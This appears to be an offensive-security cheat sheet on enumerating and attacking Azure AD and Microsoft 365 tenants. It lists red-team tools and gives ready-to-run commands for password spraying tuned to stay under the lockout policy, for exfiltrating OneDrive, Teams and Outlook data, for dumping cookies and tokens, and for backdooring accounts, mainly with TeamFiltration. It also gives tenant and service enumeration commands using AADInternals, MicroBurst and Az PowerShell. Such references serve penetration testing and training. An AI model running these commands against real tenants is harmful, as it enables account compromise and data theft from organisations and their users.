Azure AD - Enumerate
Azure AD - Collectors
- Microsoft Portals - Microsoft Administrator Sites
- ROADTool - A collection of Azure AD tools for offensive and defensive security purposes
- BloodHoundAD/AzureHound - Azure Data Exporter for BloodHound
- BloodHoundAD/BARK - BloodHound Attack Research Kit
. .\BARK.ps1 $MyRefreshTokenRequest = Get-AZRefreshTokenWithUsernamePassword -username "user@contoso.onmicrosoft.com" -password "MyVeryCoolPassword" -TenantID "contoso.onmicrosoft.com" $MyMSGraphToken = Get-MSGraphTokenWithRefreshToken -RefreshToken $MyRefreshTokenRequest.refresh_token -TenantID "contoso.onmicrosoft.com" $MyAADUsers = Get-AllAzureADUsers -Token $MyMSGraphToken.access_token -ShowProgress
- dafthack/GraphRunner - A Post-exploitation Toolset for Interacting with the Microsoft Graph API
- NetSPI/MicroBurst - MicroBurst includes functions and scripts that support Azure Services discovery, weak configuration auditing, and post exploitation actions such as credential dumping
- hausec/PowerZure - PowerShell framework to assess Azure security
- silverhack/monkey365 - Microsoft 365, Azure subscriptions and Microsoft Entra ID security configuration reviews.
- Flangvik/TeamFiltration - TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --cookie-dump C:\\CookieData.txt --all TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --aad TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --tokens C:\\OutputTokens.txt --onedrive --owa TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --teams --owa --owa-limit 5000 TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --debug --exfil --onedrive TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --enum --validate-teams TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --enum --validate-msol --usernames C:\Clients\2021\FooBar\OSINT\Usernames.txt TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --backdoor TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --database
- Azure/StormSpotter - This repository has not been updated recently - Azure Red Team tool for graphing Azure and Azure Active Directory objects
- nccgroup/Azucar - This repository has been archived - Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks.
- FSecureLABS/Azurite Explorer - This repository has not been updated recently - Enumeration and reconnaissance activities in the Microsoft Azure Cloud.
- cyberark/SkyArk - This repository has not been updated recently - Discover the most privileged users in the scanned Azure environment - including the Azure Shadow Admins.
Azure AD - User Enumeration
Enumerate Tenant Informations
- Federation with Azure AD or O365
- Get the Tenant ID
Enumerate from a Guest Account
powerpwn recon --tenant {tenantId} --cache-path {path}
powerpwn dump -tenant {tenantId} --cache-path {path}
powerpwn gui --cache-path {path}
Enumerate Emails
By default, O365 has a lockout policy of 10 tries, and it will lock out an account for one (1) minute.
- Validate email
- Extract email lists with a valid credentials : https://github.com/nyxgeek/o365recon
Password Spraying
The default lockout policy tolerates 10 failed attempts, then lock out an account for 60 seconds.
- dafthack/MSOLSpray
- 0xZDH/o365spray
- Flangvik/TeamFiltration
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --sleep-min 120 --sleep-max 200 --push --shuffle-users --shuffle-regions TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --push-locked --months-only --exclude C:\Clients\2021\FooBar\Exclude_Emails.txt TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --passwords C:\Clients\2021\FooBar\Generic\Passwords.txt --time-window 13:00-22:00
Azure Services Enumeration
Enumerate Tenant Domains
Extract openly available information for the given tenant: aadinternals.com/osint
Invoke-AADIntReconAsOutsider -DomainName <DOMAIN>
Invoke-AADIntReconAsOutsider -Domain "company.com" | Format-Table
Invoke-AADIntReconAsOutsider -UserName "user@company.com" | Format-Table
Enumerate Azure Subdomains
PS> . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureSubDomains.ps1
PS> Invoke-EnumerateAzureSubDomains -Base <TENANT NAME> -Verbose
Subdomain Service
--------- -------
<TENANT NAME>.mail.protection.outlook.com Email
<TENANT NAME>.onmicrosoft.com Microsoft Hosted Domain
Enumerate Services
-
Using Az Powershell module
# Enumerate resources PS Az> Get-AzResource # List all VM's the user has access to PS Az> Get-AzVM # Get all webapps PS Az> Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"} # Get all function apps PS Az> Get-AzFunctionApp # List all storage accounts PS Az> Get-AzStorageAccount # List all keyvaults PS Az> Get-AzKeyVault # Get all application objects registered using the current tenant PS AzureAD> Get-AzureADApplication -All $true # Enumerate role assignments PS Az> Get-AzRoleAssignment -Scope /subscriptions/<SUBSCRIPTION-ID>/resourceGroups/RESEARCH/providers/Microsoft.Compute/virtualMachines/<VM-NAME> PS Az> Get-AzRoleAssignment -SignInName test@<TENANT NAME>.onmicrosoft.com # Check AppID Alternative Names/Display Name PS AzureAD> Get-AzureADServicePrincipal -All $True | ?{$_.AppId -eq "<APP-ID>"} | fl
-
Using az cli
Multi Factor Authentication
- dafthack/MFASweep - A tool for checking if MFA is enabled on multiple Microsoft Services
References
- Bypassing conditional access by faking device compliance - @DrAzureAD - September 06, 2020
- CARTP-cheatsheet - Azure AD cheatsheet for the CARTP course
- Attacking Azure/Azure AD and introducing Powerzure - SpecterOps - Ryan Hausknecht - Jan 28, 2020
- Training - Attacking and Defending Azure Lab - Altered Security